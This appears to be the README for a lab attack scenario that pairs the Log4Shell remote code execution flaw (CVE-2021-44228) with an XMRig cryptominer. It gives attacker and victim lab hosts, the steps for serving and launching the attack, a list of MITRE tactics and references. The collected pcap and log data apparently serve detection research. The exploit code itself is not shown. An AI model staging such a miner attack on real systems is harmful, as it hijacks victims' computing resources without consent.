T9

T7-24–01–M–NE–CLM

Apache Log4J + XMRig Miner

This attack is a combination of T1-24-01-S-N-CL and T5-24-01-S-E-LM, and two logs are collected: pcap and log.

It utilizes the Log4J remote code execution vulnerability to download the Miner malware on the attacker's web server, grant execution privileges, and finally execute the Miner malware. Once the miner is executed, it significantly increases resource consumption and sends mining information to the attacker's server.

	OS	IP	Software	Log collection time	Program runtime
Attacker	Windows 11	192.168.56.1	jdk-8u20-windows-x64	90 sec	120 sec
Victim	Ubuntu 20.04.1	192.168.56.103 (Internal) 10.0.2.15 (External)	log4j 2.17.0	90 sec	120 sec

Installing

JDK [dk-8u20-windows-x64.exe] and install
```
python3 -m pip install -r requirements.txt

Using

You have to run terminal 1 before terminal 2

[Terminal 1]
python3 -m http.server 8888

[Terminal 2]
python3 run.py

MITRE ATT&CK Framework

Attack Tactic
Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion
Credential	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact

Logs

./log/2024_01_T7_{time}.log # YYmmdd_HHMMSS

References

[1] NIST [CVE-2021-44228]
[2] Trendmicro [Apache Log4J(Log4Shell) 취약점이란?
[3] Ahnlab ASEC [[안내] Apache Log4j 취약점 CVE-2021-44228 영향을 받는 Log4j Core]
[4] Paloalto [Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
[5] SK쉴더스 [[Research & Technique] Log4Shell 취약점(CVE-2021-44228)]
[6] XMRig

※ Click on the attack name to see a description and scenario for the attack